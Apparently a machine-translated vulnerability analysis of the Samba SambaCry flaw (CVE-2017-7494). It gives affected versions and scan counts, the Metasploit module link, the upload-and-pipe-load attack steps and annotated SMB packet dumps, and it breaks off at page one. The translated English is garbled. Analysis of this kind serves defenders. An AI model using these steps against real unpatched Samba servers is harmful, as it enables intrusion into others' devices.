Samba remote code execution vulnerability(CVE-2017-7494)-SambaCry analysis report-vulnerability warning-the black bar safety net

0x01 Intro
2017 5 May 24, Samba official released a security Bulletin, the new release of Samba 4.6.4 fixes a serious code execution vulnerability(CVE-2017-7494), the vulnerability affects Samba 3.5.0 after to 4. 6. 4/4. 5. 10/4. 4. 14 in the middle of all versions. At rpc_server/srv_pipe. c in the presence of a verified BUG, the attacker can use the client to upload a malicious dynamic library file to have write permissions in the shared directory, after issuing the request, the server loads the Samba directory and run outside of the illegal module, resulting in malicious code execution.
Samba is a kind of used to allow UNIX series theoperating systemwith the Microsoft Windows operating system of the SMB/CIFS network Protocol to do link free software. Many business or personal NAS(Network Attached Storage), routers and other IOT devices storage solutions will choose the open source software Samba to provide data access services. IPC$(Internet Process Connection) is a shared “named pipe” resources, allowing the user anonymous access to the Samba server’s shared resources.
0x02 vulnerability analysis
Based on 360 days eye laboratory full network scan of the data show that the current Chinese mainland and Hong Kong and Macao open 445 port the IP number is 18883, wherein the Samba service Co-4433, and the Samba version of the fall in the loophole version of the interval IP number is 3765, accounted for Samba service 85% from! Taiwan, Hong Kong, respectively, to 1767, in 1853, the remaining provinces of the distribution as shown below.
! [](/Article/UploadPic/2017-5/201752805553863. png? www. myhack58. com)
0x03 vulnerability validation and analysis
Environment preparation:
! [](/Article/UploadPic/2017-5/201752805553685. png? www. myhack58. com)
Using the Metasploit open the exploits module(is_known_pipename)for testing. Download: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb
Attack process:
1. To have write access to the Samba server share directory to upload malicious dynamic library, here named evil. so;
2. The attacker violence guess the shared directory absolute path, while to the IPC$(a named pipe)resources request step 1 Upload a malicious dynamic library, the file name changes on the server the absolute path” /path/to/evil. so”;
3. Server Error the resource file ” /path/to/evil. so” as the IPC$(a named pipe)resource loading operation, the vulnerability is triggered.
1）Upload a malicious dynamic library files to the server shared directory public
! [](/Article/UploadPic/2017-5/201752805553640. png? www. myhack58. com)
Article 51 a packet Write AndX Request write request data, as shown below:
SMB (Server Message Block Protocol)
SMB Header
Server Component: SMB
[Response in: 52]
SMB Command: Write AndX (0x2f)
Error Class: Success (0x00)
…
Tree ID: 51295 (\\192.168.119.155\public) #to access the drone of the shared file path of the Tree ID
Process ID: 51988
User ID: 62509
Multiplex ID: 27235
Write AndX Request (0x2f)
Word Count (WCT): 14
AndXCommand: No further commands (0xff)
Reserved: 00
AndXOffset: 0
FID: 0xef37 (\rDfDKbgV. so) # malicious dynamic library file FID
…
[File RW Length: 476] #write the file size
Byte Count (BCC): 476
Data (476 bytes) #upload binary data
Data: 7f454c4602010100000000000000000003003e0001000000…
[Length: 476]
2 to a named pipe request malicious dynamic library
! [](/Article/UploadPic/2017-5/201752805553810. png? www. myhack58. com)
The first 59 a packet NT Create AndX request request named pipe resource data, as follows:
SMB (Server Message Block Protocol)
SMB Header
Server Component: SMB
SMB Command: NT Create AndX (0xa2)
…
Tree ID: 19967 (\\192.168.119.155\IPC$) #here use the Named Pipes mode is very important
Process ID: 51988
User ID: 62509
Multiplex ID: 27235
NT Create AndX Request (0xa2)
Word Count (WCT): 24
AndXCommand: No further commands (0xff)
Reserved: 00
AndXOffset: 0
Reserved: 00

[1] [2] next